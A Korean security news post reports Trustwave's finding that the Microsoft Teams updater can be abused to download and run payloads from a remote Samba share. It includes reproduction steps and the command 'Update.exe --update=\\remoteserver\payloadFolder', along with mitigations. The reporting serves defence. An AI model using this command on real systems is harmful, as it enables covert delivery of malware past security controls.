상세 컨텐츠

본문 제목

해커들, 악성 페이로드 배포 위해 마이크로소프트 팀즈 업데이터 악용 가능

국내외 보안동향

by 알약4 2020. 8. 7. 10:43

본문

Hackers can abuse Microsoft Teams updater to deliver malicious payloads


Trustwave의 보안 연구원들이 공격자가 MS 팀즈 업데이터를 악용하여 원격 서버에서 바이너리 또는 악성 페이로드를 다운로드 할 수 있는 Living-Off-the-Land 기술에 대한 자세한 설명을 공개했습니다.


안타까운 점은 이 문제가 설계 결함으로 인해 발생하기 때문에 쉽게 해결이 어렵다는 것입니다.


이 문제를 해결하기 위해 이전에 제안된 방법은 URL을 통한 업데이트 기능을 제한하는 것입니다. 대신 업데이터는 제품 업데이트를 위해 공유 또는 로컬 폴더를 통한 로컬 연결을 허용합니다.


Trustwave는 분석 보고서에서 아래와 같이 밝혔습니다.


“패치가 진행되면, 마이크로소프트 팀즈 업데이터는 접근 및 업데이트에 로컬 네트워크 경로만을 허용할 것입니다. 즉 업데이터 URL에서 “http/s”, “:”, “/” 및 포트 넘버를 탐지 및 차단하고 해당 활동을 %localappdata%\Microsoft\Teams\SquirrelSetup.log에 기록합니다.”



<이미지 출처: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/>



이 메커니즘은 로컬 UNC 포맷 공유 액세스를 허용합니다. : \\server\


공격자는 아래 조건이 충족될 경우 이를 악용 가능합니다.


1. 공격자가 네트워크 내 오픈 공유 폴더에 있는 파일을 가져올 수 있어야 합니다.

2. 공격자가 해당 공유에서 피해자 컴퓨터의 페이로드에 접근할 수 있어야 합니다.


전문가들은 이 공격 시나리오가 구현하기 쉽지 않다는 것을 발견했습니다.


공격 체인을 단순화하기 위해 공격자는 로컬 공유가 아닌 원격 공유를 생성할 수 있습니다. 이 방식으로 공격자는 로컬 공유에 접근하지 않고도 원격 페이로드를 다운로드 하여 실행이 가능합니다.


연구원들은 원격 공유를 생성하기 위해서 원격 공유 접근을 허용하는 Samba 서버를 설정해 원격 페이로드를 다운로드 하고 아래 명령을 사용하여 마이크로소프트 팀즈 업데이터 “Update.Exe”에서 이를 실행할 수 있었습니다.


Update.exe --update=\\remoteserver\payloadFolder


마이크로소프트 팀즈는 설치 및 업데이트 루틴을 위해 오픈소스 프로젝트인 Squirrel을 사용합니다. Squirrel은 필요한 파일을 생성하기 위해 NuGet 패키지 매니저를 사용합니다.


이 페이로드는 이름이 “squirrel.exe”로 설정되어 있어야 하며 특정 nupkg 파일 내 배치되어야 합니다. 해당 파일은 가짜 마이크로소프트 팀즈 릴리즈의 메타 데이터를 사용하여 생성되어야 하며 접근을 위해 권한 상승이 필요하지 않은 AppData 폴더에 설치되어야 합니다.


Trustwave의 게시물에는 해당 애플리케이션의 현재 완화법을 우회하는 공격을 실행하기 위한 단계별 절차가 포함되어 있었습니다.


아래는 공격을 재현하기 위한 단계입니다.


1. 피해자의 타깃 애플리케이션 폴더로 이동 “%localappdata%/Microsoft/Teams/”

2. 다음 명령 실행

   update.exe –update=[Samba server contains the above 2 files]

   e.g. update.exe –update=\\remoteserver\payloadFolder


10~15초를 기다리면 페이로드가 성공적으로 다운로드 되어 마이크로소프트 팀즈가 이를 실행할 수 있게 됩니다. 


Trustwave의 연구원들은 이 문제를 마이크로소프트에 제보하여 아래와 같은 답변을 받았습니다.


“이 문제를 마이크로소프트에 제보해 주셔서 감사합니다. 이 문제는 설계상 발생하는 것으로 결론을 내렸습니다. 이 기능을 사용하는 고객이 있기 때문에 (예: 폴더 제한) 업데이트를 위한 SMB 소스를 제한할 수 없기 때문입니다.”


가능한 완화법에는 “update.exe” 명령줄을 모니터링하여 의심스러운 연결이 있는지 확인하고,  “squirrel.exe”의 사이즈 및 해시에서 이상 항목을 확인하는 것이 있습니다.





출처:

https://securityaffairs.co/wordpress/106821/hacking/microsoft-teams-updater-malware.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/

관련글 더보기

댓글 영역